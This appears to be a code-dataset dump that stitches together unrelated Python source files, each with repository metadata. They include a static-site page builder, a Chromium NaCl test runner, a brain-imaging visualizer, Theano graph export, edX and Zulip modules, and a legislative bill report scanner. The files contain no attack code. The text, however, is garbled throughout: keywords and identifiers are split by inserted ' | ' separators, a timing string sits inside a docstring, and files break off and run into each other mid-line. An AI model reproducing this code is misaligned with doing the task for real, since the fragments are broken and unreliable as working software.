"markdownlink" : os.path.basename(page_file),
"directory" : os.path.basename(os.path.dirname(page_file))
})
if self.config["local"]:
self.pagevars["url"] = self.pagevars["output"]
else:
self.pagevars["url"] = self.pagevars["output"].replace(self.pagevars["roo | tpath"], 'http://'+self.pagevars["domain"])
# update pagevars
if overrides:
self.pagevars.update(overrides)
self.pagevars["keywords"] = ','.join(self.pagevars["keywords"])
self.__do_debug = self.pagevars["output"] == DEBUG_FILE
# parse html and build soup
self.soup = bs4.BeautifulSoup(quilt, "lxml")
# build patches
self.patches = copy.deepcopy(patches)
# process page file
self.parse_page(page)
# keep track of processing time
self.start = time.time()
#@profile
def parse_page(self, page):
"""parses page into vars, html, and scripts7.487 s"""
if self.__do_debug:
write_file(add_suffix(DEBUG_FILE, '_original-page'), page.encode('utf-8'))
if FIRST_KEY_RE.match(page.split('\n', 1)[0]):
page_vars, page_html = FIRST_EMPTY_LINE_RE.split(page, 1)
else:
page_vars, page_html = None, page
page_js, page_html = JS_HTML_PATTERN_RE.match(page_html[::-1]).groups()
page_html = page_html[::-1]
page_js = page_js[::-1] if page_js else None
# update pagevars with page var json
if page_vars:
self.pagevars.update(parse_pagevars(page_vars))
if self.__do_debug:
write_file(add_suffix(DEBUG_FILE, 'parsed-page'), page_html.encode('utf-8'))
# handle markdown if necessary
if self.__do_markdown:
page_html_md = MD.reset().convert(page_html)
if self.__do_debug:
write_file(add_suffix(DEBUG_FILE, '_markdown-output'), page_html_md.encode('utf-8'))
page_html = page_html_md.replace("<code> ", "<code>").replace(" </code>", "</code>")
if self.__wrap and self.patches["markdown"]:
page_html = self.patches["markdown"].replace("{{markdown}}", page_html)
# set page html
self.patches["page"] = page_html
# append page script to quilt
if page_js:
self.patches["scripts"] = '%s\n%s' % (self.patches["scripts"], page_js)
# add page variables to object
if self.config["pageobject"]:
filtered_pagevars = {k:str(v) for k, v in self.pagevars.items() if k in PAGEVARS_TO_PRINT}
page_obj = json.dumps(filtered_pagevars, indent=4, separators=(',', ': '), sort_keys=True)
if self.config["minimizejs"]:
page_obj = minimize_js(page_obj)
self.patches["scripts"] = '%s\n%s' % (PAGEOBJ % (page_obj), self.patches["scripts"])
if self.__do_debug:
write_file(add_suffix(DEBUG_FILE, '_markdown-wrapped'), page_html.encode('utf-8'))
return self
#@profile
def replace_patches(self):
"""replace all patches in quilt with patch files"""
# replace head (special case of patch)
head = bs4.BeautifulSoup(self.patches["head"], "lxml", parse_only=HEAD_STRAINER).head
self.soup.html.head.replace_with(head)
if self.pagevars["patchcomment"]:
self.soup.html.insert(0, self.soup.new_string("quilted head patch", bs4.Comment))
self.soup.html.insert(0, '\n')
# replace all other patches, recursively
patch_tags = self.soup.find_all("patch")
while len(patch_tags) > 0:
for patch in patch_tags:
if patch["id"] in self.patches and self.patches[patch["id"]]:
if patch["id"] == "scripts":
patch_soup = bs4.BeautifulSoup(
self.patches[patch["id"]].en |
M4sse/chromium.src | native_client_sdk/src/build_tools/test_projects.py | Python | bsd-3-clause | 12,150 | 0.011193 | #!/usr/bin/env python
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import optparse
import os
import subprocess
import sys
import time
import build_projects
import build_version
import buildbot_common
import parse_dsc
from build_paths import OUT_DIR, SRC_DIR, SDK_SRC_DIR, SCRIPT_DIR
sys.path.append(os.path.join(SDK_SRC_DIR, 'tools'))
import getos
platform = getos.GetPlatform()
# TODO(binji): ugly hack -- can I get the browser in a cleaner way?
sys.path.append(os.path.join(SRC_DIR, 'chrome', 'test', 'nacl_test_injection'))
import find_chrome
browser_path = find_chrome.FindChrome(SRC_DIR, ['Debug', 'Release'])
# Fall back to using CHROME_PATH (same as in common.mk)
if not browser_path:
browser_path = os.environ['CHROME_PATH']
pepper_ver = str(int(build_version.ChromeMajorVersion()))
pepperdir = os.path.join(OUT_DIR, 'pepper_' + pepper_ver)
browser_tester_py = os.path.join(SRC_DIR, 'ppapi', 'native_client', 'tools',
'browser_tester', 'browser_tester.py')
ALL_CONFIGS = ['Debug', 'Release']
ALL_TOOLCHAINS = ['newlib', 'glibc', 'pnacl', 'win', 'linux', 'mac']
# Values you can filter by:
# name: The name of the test. (e.g. "pi_generator")
# config: See ALL_CONFIGS above.
# toolchain: See ALL_TOOLCHAINS above.
# platform: mac/win/linux.
#
# All keys must be matched, but any value that matches in a sequence is
# considered a match for that key. For example:
#
# {'name': ('pi_generator', 'input_event'), 'toolchain': ('newlib', 'pnacl')}
#
# Will match 8 tests:
# pi_generator.newlib_debug_test
# pi_generator.newlib_release_test
# input_event.newlib_debug_test
# input_event.newlib_release_test
# pi_generator.glibc_debug_test
# pi_generator.glibc_release_test
# input_event.glibc_debug_test
# input_event.glibc_release_test
DISABLED_TESTS = [
# TODO(binji): Disable 3D examples on linux/win/mac. See
# http://crbug.com/262379.
{'name': 'graphics_3d', 'platform': ('win', 'linux', 'mac')},
{'name': 'video_decode', 'platform': ('win', 'linux', 'mac')},
# media_stream_audio uses audio input devices which are not supported.
{'name': 'media_stream_audio', 'platform': ('win', 'linux', 'mac')},
# media_stream_video uses 3D and webcam which are not supported.
{'name': 'media_stream_video', 'platform': ('win', 'linux', 'mac')},
# TODO(binji): These tests timeout on the trybots because the NEXEs take
# more than 40 seconds to load (!). See http://crbug.com/280753
{'name': 'nacl_io_test', 'platform': 'win', 'toolchain': 'glibc'},
# We don't test "getting_started/part1" because it would complicate the
# example.
# TODO(binji): figure out a way to inject the testing code without
# modifying the example; maybe an extension?
{'name': 'part1'},
]
def ValidateToolchains(toolchains):
invalid_toolchains = set(toolchains) - set(ALL_TOOLCHAINS)
if invalid_toolchains:
    buildbot_common.ErrorExit('Invalid toolchain(s): %s' % (
', '.join(invalid_toolchains)))
def GetServingDirForProject(desc):
dest = desc['DEST']
path = os.path.join(pepperdir, *dest.split('/'))
return os.path.join(path, desc['NAME'])
def GetRepoServingDirForProject(desc):
# This differs from GetServingDirForProject, because it returns the location
# within the Chrome repository of the project, not the "pepperdir".
return os.path.dirname(desc['FILEPATH'])
def GetExecutableDirForProject(desc, toolchain, config):
return os.path.join(GetServingDirForProject(desc), toolchain, config)
def GetBrowserTesterCommand(desc, toolchain, config):
if browser_path is None:
buildbot_common.ErrorExit('Failed to find chrome browser using FindChrome.')
args = [
sys.executable,
browser_tester_py,
'--browser_path', browser_path,
'--timeout', '30.0', # seconds
# Prevent the infobar that shows up when requesting filesystem quota.
'--browser_flag', '--unlimited-storage',
'--enable_sockets',
# Prevent installing a new copy of PNaCl.
'--browser_flag', '--disable-component-update',
]
args.extend(['--serving_dir', GetServingDirForProject(desc)])
# Fall back on the example directory in the Chromium repo, to find test.js.
args.extend(['--serving_dir', GetRepoServingDirForProject(desc)])
# If it is not found there, fall back on the dummy one (in this directory).
args.extend(['--serving_dir', SCRIPT_DIR])
if toolchain == platform:
exe_dir = GetExecutableDirForProject(desc, toolchain, config)
ppapi_plugin = os.path.join(exe_dir, desc['NAME'])
if platform == 'win':
ppapi_plugin += '.dll'
else:
ppapi_plugin += '.so'
args.extend(['--ppapi_plugin', ppapi_plugin])
ppapi_plugin_mimetype = 'application/x-ppapi-%s' % config.lower()
args.extend(['--ppapi_plugin_mimetype', ppapi_plugin_mimetype])
if toolchain == 'pnacl':
args.extend(['--browser_flag', '--enable-pnacl'])
url = 'index.html'
url += '?tc=%s&config=%s&test=true' % (toolchain, config)
args.extend(['--url', url])
return args
def GetBrowserTesterEnv():
# browser_tester imports tools/valgrind/memcheck_analyze, which imports
# tools/valgrind/common. Well, it tries to, anyway, but instead imports
# common from PYTHONPATH first (which on the buildbots, is a
# common/__init__.py file...).
#
# Clear the PYTHONPATH so it imports the correct file.
env = dict(os.environ)
env['PYTHONPATH'] = ''
return env
def RunTestOnce(desc, toolchain, config):
args = GetBrowserTesterCommand(desc, toolchain, config)
env = GetBrowserTesterEnv()
start_time = time.time()
try:
subprocess.check_call(args, env=env)
result = True
except subprocess.CalledProcessError:
result = False
elapsed = (time.time() - start_time) * 1000
return result, elapsed
def RunTestNTimes(desc, toolchain, config, times):
total_elapsed = 0
for _ in xrange(times):
result, elapsed = RunTestOnce(desc, toolchain, config)
total_elapsed += elapsed
if result:
# Success, stop retrying.
break
return result, total_elapsed
def RunTestWithGtestOutput(desc, toolchain, config, retry_on_failure_times):
test_name = GetTestName(desc, toolchain, config)
WriteGtestHeader(test_name)
result, elapsed = RunTestNTimes(desc, toolchain, config,
retry_on_failure_times)
WriteGtestFooter(result, test_name, elapsed)
return result
def WriteGtestHeader(test_name):
print '\n[ RUN ] %s' % test_name
sys.stdout.flush()
sys.stderr.flush()
def WriteGtestFooter(success, test_name, elapsed):
sys.stdout.flush()
sys.stderr.flush()
if success:
message = '[ OK ]'
else:
message = '[ FAILED ]'
print '%s %s (%d ms)' % (message, test_name, elapsed)
def GetTestName(desc, toolchain, config):
return '%s.%s_%s_test' % (desc['NAME'], toolchain, config.lower())
def IsTestDisabled(desc, toolchain, config):
def AsList(value):
if type(value) not in (list, tuple):
return [value]
return value
def TestMatchesDisabled(test_values, disabled_test):
for key in test_values:
if key in disabled_test:
if test_values[key] not in AsList(disabled_test[key]):
return False
return True
test_values = {
'name': desc['NAME'],
'toolchain': toolchain,
'config': config,
'platform': platform
}
for disabled_test in DISABLED_TESTS:
if TestMatchesDisabled(test_values, disabled_test):
return True
return False
def WriteHorizontalBar():
print '-' * 80
def WriteBanner(message):
WriteHorizontalBar()
print message
WriteHorizontalBar()
def RunAllTestsInTree(tree, toolchains, configs, retry_on_failure_times):
tests_run = 0
total_tests = 0
failed = []
disabled = []
for _, desc in parse_dsc.GenerateProjects(tree):
desc_configs = desc.get('CONFIGS', ALL_CONFIGS)
valid_toolchains = set(toolchains) & set(desc['TOOLS'])
valid_configs = set(configs) & set(desc_configs)
for toolchain in sorted(valid_toolchains):
for config in sorted(valid_configs):
|
akritichadda/K-AND | daniel/vis3DConnect.py | Python | mit | 4,715 | 0.018028 | import pandas as pd
import scipy.ndimage as ndi
import numpy as np
import time
import urllib  # used by vis3D_getPath below
import json    # used by vis3D_getPath below
import pyqtgraph as pg
import pyqtgraph.opengl as pgl
pg.mkQApp()
def vis3D(brain_array,inj_array,pad = 30,ds_factor=6):
# set up time variables
now = time.time()
now_start = now
view = vis3D_glassBrain(brain_array,pad,ds_factor)
print "build brain isosurface %0.2f" % (time.time() - now); now = time.time()
view = vis3D_projectio | ns(view,inj_array,ds_factor)
print "build injection volume %0.2f" % (time.time() - now); now = time.time()
view.show()
print "rendering %0.2f" % (time.time() - now); now = time.time()
print "total run time: %0.2f" % (time.time() - now_start)
return view
de | f vis3D_glassBrain(brain_array,pad,ds_factor):
# initialize the window
view = pgl.GLViewWidget()
# downsample the brain image using the ds_factor
img = brain_array[::ds_factor,::ds_factor,::ds_factor]
# do padding of the brain to avoid holes during rendering
pad_img = np.zeros((img.shape[0]+pad, img.shape[1]+pad, img.shape[2]+pad), dtype=img.dtype)
pad_img[pad/2:pad/2+img.shape[0], pad/2:pad/2+img.shape[1], pad/2:pad/2+img.shape[2]] = img
# build the brain isosurface
verts, faces = pg.isosurface(ndi.gaussian_filter(pad_img.astype('float32'), (1, 1, 1)), 5.0)
md = pgl.MeshData(vertexes=verts, faces=faces)
mesh = pgl.GLMeshItem(meshdata=md, smooth=True, color=[0.5, 0.5, 0.5, 0.1], shader='balloon')
mesh.setGLOptions('additive')
mesh.translate(-pad_img.shape[0]*(ds_factor/2.), -pad_img.shape[1]*(ds_factor/2.), -pad_img.shape[2]*(ds_factor/2.))
mesh.scale(ds_factor,ds_factor,ds_factor)
mesh.rotate(-90, 1, 0, 0)
view.addItem(mesh)
view.setCameraPosition(distance=200, elevation=20, azimuth=90)
view.setWindowTitle('Consciousness is an illusion')
view.show()
return view
def vis3D_projections(view,inj_array,ds_factor=1):
ds_factor=1 # disabled ds_factor because it isn't implemented
# render the injection(s) as a volume
# inj_array should be a list of tuples, with the first element in the tuple
# being the plotting color (a RGB value), and the second element being the
# ND-array of the volumetric data for a given injection
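    # For instance (illustrative values): inj_array = [((1., 0., 0.), vol_a),
    # ((0., 1., 0.), vol_b)] renders vol_a in red and vol_b in green, where
    # vol_a and vol_b are 3D arrays of identical shape.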
vols = np.zeros(inj_array[0][1].shape + (4,), dtype='float32')
for inj in range(len(inj_array)):
col = inj_array[inj][0]
vols[...,0] += col[0] * inj_array[inj][1] # red channel
vols[...,1] += col[1] * inj_array[inj][1] # green channel
vols[...,2] += col[2] * inj_array[inj][1] # blue channel
vols[...,3] += inj_array[inj][1] * 255 # alpha channel
# Set alpha and make sure the maximum alpha is 255
vols[...,3] *= 5
vols[...,3] = np.clip(vols[...,3],0,255)
# now add the volume to the view window
vi = pgl.GLVolumeItem(vols)
vi.translate(-vols.shape[0]*(ds_factor/2.), -vols.shape[1]*(ds_factor/2.), -vols.shape[2]*(ds_factor/2.))
vi.scale(ds_factor,ds_factor,ds_factor)
vi.setGLOptions('additive')
vi.rotate(-90, 1, 0, 0)
view.setCameraPosition(distance=200, elevation=20, azimuth=90)
view.addItem(vi)
return view
def vis3D_structureMask(view,mask,maskCol,ds_factor):
# downsample the brain image using the ds_factor
img = mask[::ds_factor,::ds_factor,::ds_factor]
# build the brain isosurface
verts, faces = pg.isosurface(ndi.gaussian_filter(img.astype('float32'), (0.5, 0.5, 0.5)), .5)
md = pgl.MeshData(vertexes=verts, faces=faces)
meshMask = pgl.GLMeshItem(meshdata=md, smooth=True, color=[maskCol[0], maskCol[1], maskCol[2], 0.2], shader='balloon')
meshMask.setGLOptions('additive')
meshMask.translate(-img.shape[0]/2., -img.shape[1]/2., -img.shape[2]/2.)
meshMask.scale(ds_factor,ds_factor,ds_factor)
meshMask.rotate(-90, 1, 0, 0)
view.addItem(meshMask)
view.setCameraPosition(distance=200, elevation=20, azimuth=90)
view.show()
return view
def vis3D_getPath( target_voxel, experiment_id ) :
url = "http://api.brain-map.org/api/v2/data/query.json?criteria=service::mouse_connectivity_target_spatial"
url = url + "[seed_point$eq%s]" % ','.join([str(s) for s in target_voxel])
url = url + "[section_data_set$eq%d]" % experiment_id
response = urllib.urlopen(url)
data = json.loads(response.read())
data = [s['coord'] for s in data['msg'][0]['path']]
return data
def vis3D_showPaths(view,paths,pathCols,ds_factor):
pts = paths[::ds_factor]
plt = pgl.GLLinePlotItem(pos=pts, color=pg.glColor([255,0,0,255]), width=2, antialias=True)
view.addItem(plt)
view.show()
return view
|
valexandersaulys/airbnb_kaggle_contest | venv/lib/python3.4/site-packages/Theano-0.7.0-py3.4.egg/theano/d3viz/d3viz.py | Python | gpl-2.0 | 3,909 | 0.000256 | """Dynamic visualization of Theano graphs.
Author: Christof Angermueller <cangermueller@gmail.com>
"""
import os
import shutil
import re
from six import iteritems
from theano.d3viz.formatting import PyDotFormatter
__path__ = os.path.dirname(os.path.realpath(__file__))
def replace_patterns(x, replace):
"""Replace `replace` in string `x`.
Parameters
----------
    x : str
        String on which function is applied
    replace : dict
        `key`, `value` pairs where `key` is a plain substring and `value`
        the string it is replaced with (no regular expressions involved)
"""
for from_, to in iteritems(replace):
x = x.replace(str(from_), str(to))
return x
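# Hedged usage sketch, using the template markers defined further below:
#   replace_patterns('src="%% JS_DIR %%/d3.js"', {'%% JS_DIR %%': 'd3viz/js'})
# returns 'src="d3viz/js/d3.js"'.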
def escape_quotes(s):
"""Escape quotes in string.
Parameters
----------
s : str
String on which function is applied
"""
s = re.sub(r'''(['"])''', r'\\\1', s)
return s
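# For example (illustrative): escape_quotes('He said "hi"') returns the
# string He said \"hi\" -- both single and double quotes gain a backslash.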
def d3viz(fct, outfile, copy_deps=True, *args, **kwargs):
"""Create HTML file with dynamic visualizing of a Theano function graph.
In the HTML file, the whole graph or single nodes can be moved by drag and
drop. Zooming is possible via the mouse wheel. Detailed information about
nodes and edges are displayed via mouse-over events. Node labels can be
edited by selecting Edit from the context menu.
Input nodes are colored in green, output nodes in blue. Apply nodes are
ellipses, and colored depending on the type of operation they perform. Red
ellipses are transfers from/to the GPU (ops with names GpuFromHost,
HostFromGpu).
Edges are black by default. If a node returns a view of an
input, the input edge will be blue. If it returns a destroyed input, the
edge will be red.
Parameters
----------
fct : theano.compile.function_module.Function
A compiled Theano function, variable, apply or a list of variables.
outfile : str
Path to output HTML file.
copy_deps : bool, optional
Copy javascript and CSS dependencies to output directory.
Notes
-----
This function accepts extra parameters which will be forwarded to
:class:`theano.d3viz.formatting.PyDotFormatter`.
"""
# Create DOT graph
formatter = PyDotFormatter(*args, **kwargs)
graph = formatter(fct)
dot_graph = escape_quotes(graph.create_dot()).replace('\n', '').replace('\r', '')
# Create output directory if not existing
outdir = os.path.dirname(outfile)
if not os.path.exists(outdir):
os.makedirs(outdir)
# Read template HTML file
template_file = os.path.join(__path__, 'html', 'template.html')
f = open(template_file)
template = f.read()
f.close()
# Copy dependencies to output directory
src_deps = __path__
if copy_deps:
dst_deps = 'd3 | viz'
for d in ['js', 'css']:
dep = os.path.join(outdir, dst_deps, d)
if not os.path.exists(dep):
shutil.copytree(os.path.join(src_deps, d), dep)
else:
dst_deps = src_deps
# Replace patterns in template
replace = {
'%% JS_DIR %%': os.path.join(dst_deps, 'js'),
'%% CSS_DIR % | %': os.path.join(dst_deps, 'css'),
'%% DOT_GRAPH %%': dot_graph,
}
html = replace_patterns(template, replace)
# Write HTML file
with open(outfile, 'w') as f:
f.write(html)
def d3write(fct, path, *args, **kwargs):
"""Convert Theano graph to pydot graph and write to dot file.
Parameters
----------
fct : theano.compile.function_module.Function
A compiled Theano function, variable, apply or a list of variables.
path: str
Path to output file
Notes
-----
This function accepts extra parameters which will be forwarded to
:class:`theano.d3viz.formatting.PyDotFormatter`.
"""
formatter = PyDotFormatter(*args, **kwargs)
graph = formatter(fct)
graph.write_dot(path)
|
fintech-circle/edx-platform | openedx/core/djangoapps/waffle_utils/tests/test_init.py | Python | agpl-3.0 | 2,228 | 0.004039 | """
Tests for waffle utils features.
"""
import ddt
from django.test import TestCase
from mock import patch
from opaque_keys.edx.keys import CourseKey
from waffle.testutils import override_flag
from request_cache. | middleware import RequestCache
from .. import CourseWaffleFlag, WaffleFlagNamespace
from ..models import WaffleFlagCourseOverrideModel
@ddt.ddt
class TestCourseWaffleFlag(TestCase):
"""
Tests the CourseWaffleFlag.
"""
NAMESPACE_NAME = "test_namespace"
FLAG_NAME = "test_flag"
NAMESPACED_FLAG_NAME = NAMESPACE_NAME + "." + FLAG_NAME
TEST_COURSE_KEY | = CourseKey.from_string("edX/DemoX/Demo_Course")
TEST_NAMESPACE = WaffleFlagNamespace(NAMESPACE_NAME)
TEST_COURSE_FLAG = CourseWaffleFlag(TEST_NAMESPACE, FLAG_NAME)
@ddt.data(
{'course_override': WaffleFlagCourseOverrideModel.ALL_CHOICES.on, 'waffle_enabled': False, 'result': True},
{'course_override': WaffleFlagCourseOverrideModel.ALL_CHOICES.off, 'waffle_enabled': True, 'result': False},
{'course_override': WaffleFlagCourseOverrideModel.ALL_CHOICES.unset, 'waffle_enabled': True, 'result': True},
{'course_override': WaffleFlagCourseOverrideModel.ALL_CHOICES.unset, 'waffle_enabled': False, 'result': False},
)
def test_course_waffle_flag(self, data):
"""
Tests various combinations of a flag being set in waffle and overridden
for a course.
"""
RequestCache.clear_request_cache()
with patch.object(WaffleFlagCourseOverrideModel, 'override_value', return_value=data['course_override']):
with override_flag(self.NAMESPACED_FLAG_NAME, active=data['waffle_enabled']):
# check twice to test that the result is properly cached
self.assertEqual(self.TEST_COURSE_FLAG.is_enabled(self.TEST_COURSE_KEY), data['result'])
self.assertEqual(self.TEST_COURSE_FLAG.is_enabled(self.TEST_COURSE_KEY), data['result'])
# result is cached, so override check should happen once
WaffleFlagCourseOverrideModel.override_value.assert_called_once_with(
self.NAMESPACED_FLAG_NAME,
self.TEST_COURSE_KEY
)
|
Assassinss/daily-artwork | src/worker.py | Python | gpl-3.0 | 229 | 0 | from src import cron
from src.api import | Api
api = Api()
def fetch_photo():
api.fetch_photo()
@cron.route('/worker', methods=['GET'])
def scheduler_worker():
fe | tch_photo()
return 'fetch photo...'
|
brainwane/zulip | zerver/data_import/hipchat_user.py | Python | apache-2.0 | 2,581 | 0 | from typing import Any, Dict, List
from django.utils.timezone import now as timezone_now
from zerver.data_import.import_util import build_user_profile
from zerver.models import UserProfile
class UserHandler:
'''
Our UserHandler class is a glorified wrapper
around the data that eventually goes into
zerver_userprofile.
The class helps us do things lik | e map ids
to names for mentions.
We also sometimes need to build mirror
users on the fly.
'''
def __init__(self) -> None:
self.id_to_user_map: Dict[int, Dict[str, Any]] = dict()
self.name_to_mirror_user_map: Dict[str, Dict[str, Any]] = dict()
self.mirror_user_id = 1
def add_user(self, user: Dict[str, Any]) - | > None:
user_id = user['id']
self.id_to_user_map[user_id] = user
def get_user(self, user_id: int) -> Dict[str, Any]:
user = self.id_to_user_map[user_id]
return user
def get_mirror_user(self,
realm_id: int,
name: str) -> Dict[str, Any]:
if name in self.name_to_mirror_user_map:
user = self.name_to_mirror_user_map[name]
return user
user_id = self._new_mirror_user_id()
short_name = name
full_name = name
email = f'mirror-{user_id}@example.com'
delivery_email = email
avatar_source = 'G'
date_joined = int(timezone_now().timestamp())
timezone = 'UTC'
user = build_user_profile(
avatar_source=avatar_source,
date_joined=date_joined,
delivery_email=delivery_email,
email=email,
full_name=full_name,
id=user_id,
is_active=False,
role=UserProfile.ROLE_MEMBER,
is_mirror_dummy=True,
realm_id=realm_id,
short_name=short_name,
timezone=timezone,
)
self.name_to_mirror_user_map[name] = user
return user
def _new_mirror_user_id(self) -> int:
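        # Walk forward from the counter until we find an id that does not
        # collide with a real user id, then park the counter one past it.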
next_id = self.mirror_user_id
while next_id in self.id_to_user_map:
next_id += 1
self.mirror_user_id = next_id + 1
return next_id
def get_normal_users(self) -> List[Dict[str, Any]]:
users = list(self.id_to_user_map.values())
return users
def get_all_users(self) -> List[Dict[str, Any]]:
normal_users = self.get_normal_users()
mirror_users = list(self.name_to_mirror_user_map.values())
all_users = normal_users + mirror_users
return all_users
|
kursitet/edx-ora2 | openassessment/assessment/api/self.py | Python | agpl-3.0 | 12,139 | 0.001812 | """
Public interface for self-assessment.
"""
import logging
from django.db import DatabaseError, transaction
from dogapi import dog_stats_api
from submissions.api import get_submission_and_student, SubmissionNotFoundError
from openassessment.assessment.serializers import (
InvalidRubric, full_assessment_dict, rubric_from_dict, serialize_assessments
)
from openassessment.assessment.models import (
Assessment, AssessmentPart, InvalidRubricSelection
)
from openassessment.assessment.errors import (
SelfAssessmentRequestError, SelfAssessmentInternalError
)
# Assessments are tagged as "self-evaluation"
SELF_TYPE = "SE"
logger = logging.getLogger("openassessment.assessment.api.self")
def submitter_is_finished(submission_uuid, requirements):
"""
Check whether a self-assessment has been completed for a submission.
Args:
submission_uuid (str): The unique identifier of the submission.
requirements (dict): Any attributes of the assessment module required
to determine if this assessment is complete. There are currently
no requirements for a self-assessment.
Returns:
True if the submitter has assessed their answer
Examples:
>>> submitter_is_finished('222bdf3d-a88e-11e3-859e-040ccee02800', {})
True
"""
return Assessment.objects.filter(
score_type=SELF_TYPE, submission_uuid=submission_uuid
).exists()
def assessment_is_finished(submission_uuid, requirements):
"""
Check whether a self-assessment has been completed. For self-assessment,
this function is synonymous with submitter_is_finished.
Args:
submission_uuid (str): The unique identifier of the submission.
requirements (dict): Any attributes of the assessment module required
to determine if this assessment is complete. There are currently
no requirements for a self-assessment.
Returns:
True if the assessment is complete.
Examples:
>>> assessment_is_finished('222bdf3d-a88e-11e3-859e-040ccee02800', {})
True
"""
return submitter_is_finished(submission_uuid, requirements)
def get_score(submission_uuid, requirements):
"""
Get the score for this particular assessment.
Args:
submission_uuid (str): The unique identifier for the submission
requirements (dict): Not used.
Returns:
A dict of points earned and points possible for the given submission.
Returns None if no score can be determined yet.
Examples:
>>> get_score('222bdf3d-a88e-11e3-859e-040ccee02800', {})
{
'points_earned': 5,
'points_possible': 10
}
"""
assessment = get_assessment(submission_uuid)
if not assessment:
return None
return {
"points_earned": assessment["points_earned"],
"points_possible": assessment["points_possible"]
}
def create_assessment(
submission_uuid,
user_id,
options_selected,
criterion_feedback,
overall_feedback,
rubric_dict,
scored_at=None
):
"""
Create a self-assessment for a submission.
Args:
submission_uuid (str): The unique identifier for the submission being assessed.
user_id (str): The ID of the user creating the assessment. This must match the ID of the user who made the submission.
options_selected (dict): Mapping of rubric criterion names to option values selected.
criterion_feedback (dict): Dictionary mapping criterion names to the
free-form text feedback the user gave for the criterion.
Since criterion feedback is optional, some criteria may not appear
in the dictionary.
overall_feedback (unicode): Free-form text feedback on the submission overall.
rubric_dict (dict): Serialized Rubric model.
Keyword Arguments:
scored_at (datetime): The timestamp of the assessment; defaults to the current time.
Returns:
dict: serialized Assessment model
Raises:
SelfAssessmentRequestError: Could not retrieve a submission that the user is allowed to score.
"""
# Check that there are not any assessments for this submission
if Assessment.objects.filter(submission_uuid=submission_uuid, score_type=SELF_TYPE).exists():
msg = (
u"Cannot submit a self-assessment for the submission {uuid} "
"because another self-assessment already exists for that submission."
).format(uuid=submission_uuid)
raise SelfAssessmentRequestError(msg)
# Check that the student is allowed to assess this submission
try:
submission = get_submission_and_student(submission_uuid)
if submission['student_item']['student_id'] != user_id:
msg = (
u"Cannot submit a self-assessment for the submission {uuid} "
u"because it was created by another student "
u"(submission student ID {student_id} does not match your "
u"student id {other_id})"
).format(
uuid=submission_uuid,
student_id=submission['student_item']['student_id'],
other_id=user_id
)
raise SelfAssessmentRequestError(msg)
except SubmissionNotFoundError:
msg = (
"Could not submit a self-assessment because no submission "
"exists with UUID {uuid}"
).format(uuid=submission_uuid)
        raise SelfAssessmentRequestError(msg)
try:
assessment = _complete_assessmen | t(
submission_uuid,
user_id,
options_selected,
criterion_feedback,
overall_feedback,
rubric_dict,
scored_at
)
_log_assessment(assessment, submission)
except InvalidRubric as ex:
msg = "Invalid rubric definition: " + str(ex)
| logger.warning(msg, exc_info=True)
raise SelfAssessmentRequestError(msg)
except InvalidRubricSelection as ex:
msg = "Selected options do not match the rubric: " + str(ex)
logger.warning(msg, exc_info=True)
raise SelfAssessmentRequestError(msg)
except DatabaseError:
error_message = (
u"Error creating self assessment for submission {}"
).format(submission_uuid)
logger.exception(error_message)
raise SelfAssessmentInternalError(error_message)
# Return the serialized assessment
return full_assessment_dict(assessment)
@transaction.commit_on_success
def _complete_assessment(
submission_uuid,
user_id,
options_selected,
criterion_feedback,
overall_feedback,
rubric_dict,
scored_at
):
"""
Internal function for creating an assessment and its parts atomically.
Args:
submission_uuid (str): The unique identifier for the submission being
assessed.
user_id (str): The ID of the user creating the assessment. This must
match the ID of the user who made the submission.
options_selected (dict): Mapping of rubric criterion names to option
values selected.
criterion_feedback (dict): Dictionary mapping criterion names to the
free-form text feedback the user gave for the criterion.
Since criterion feedback is optional, some criteria may not appear
in the dictionary.
overall_feedback (unicode): Free-form text feedback on the submission overall.
rubric_dict (dict): Serialized Rubric model.
scored_at (datetime): The timestamp of the assessment.
Returns:
Assessment model
"""
# Get or create the rubric
rubric = rubric_from_dict(rubric_dict)
# Create the self assessment
assessment = Assessment.create(
rubric,
user_id,
submission_uuid,
SELF_TYPE,
scored_at=scored_at,
feedback=overall_feedback
)
# This will raise an `InvalidRubricSelection` if the selected options do not match the rubric.
AssessmentPart.create_from_option_names(assessment, options_selected, |
loandy/billy | billy/reports/bills.py | Python | bsd-3-clause | 8,433 | 0.000119 | import datetime
import logging
from collections import defaultdict
from billy.core import db
from billy.core import settings
from billy.utils import term_for_session
from billy.reports.utils import (update_common, get_quality_exceptions,
combine_reports)
logger = logging.getLogger('billy')
def _bill_report_dict():
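    # Keys prefixed with "_" are raw counters; calculate_percentages() below
    # pops them once they have been converted into percentage fields.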
return {'upper_count': 0,
'lower_count': 0,
'bill_types': defaultdict(int),
'_updated_this_year_count': 0,
'_updated_this_month_count': 0,
'_updated_today_count': 0,
'actions_unsorted': set(),
'actionless_count': 0,
'action_count': 0,
'actions_per_type': defaultdict(int),
'actions_per_actor': defaultdict(int),
'actions_per_month': defaultdict(int),
'sponsorless_count': 0,
'_sponsor_count' | : 0,
'_sponsors_with_i | d_count': 0,
'sponsors_per_type': defaultdict(int),
'_subjects_count': 0,
'bills_per_subject': defaultdict(int),
'versionless_count': 0,
'version_count': 0,
'unmatched_sponsors': set(),
'progress_meter_gaps': set(),
}
def scan_bills(abbr):
duplicate_sources = defaultdict(int)
duplicate_versions = defaultdict(int)
other_actions = defaultdict(int)
uncategorized_subjects = defaultdict(int)
sessions = defaultdict(_bill_report_dict)
# load exception data into sets of ids indexed by exception type
quality_exceptions = get_quality_exceptions(abbr)
for bill in db.bills.find({settings.LEVEL_FIELD: abbr}):
session_d = sessions[bill['session']]
# chamber count & bill_types
if bill['chamber'] == 'lower':
session_d['lower_count'] += 1
elif bill['chamber'] == 'upper':
session_d['upper_count'] += 1
for type in bill['type']:
session_d['bill_types'][type] += 1
update_common(bill, session_d)
# actions
last_date = datetime.datetime(1900, 1, 1)
for action in bill['actions']:
date = action['date']
if date < last_date:
session_d['actions_unsorted'].add(bill['_id'])
session_d['action_count'] += 1
for type in action['type']:
session_d['actions_per_type'][type] += 1
if 'other' in action['type']:
other_actions[action['action']] += 1
session_d['actions_per_actor'][action['actor']] += 1
session_d['actions_per_month'][date.strftime('%Y-%m')] += 1
# handle no_actions bills
if not bill['actions']:
if bill['_id'] not in quality_exceptions['bills:no_actions']:
session_d['actionless_count'] += 1
else:
quality_exceptions['bills:no_actions'].remove(bill['_id'])
# sponsors
for sponsor in bill['sponsors']:
session_d['_sponsor_count'] += 1
if sponsor.get('leg_id') or sponsor.get('committee_id'):
session_d['_sponsors_with_id_count'] += 1
else:
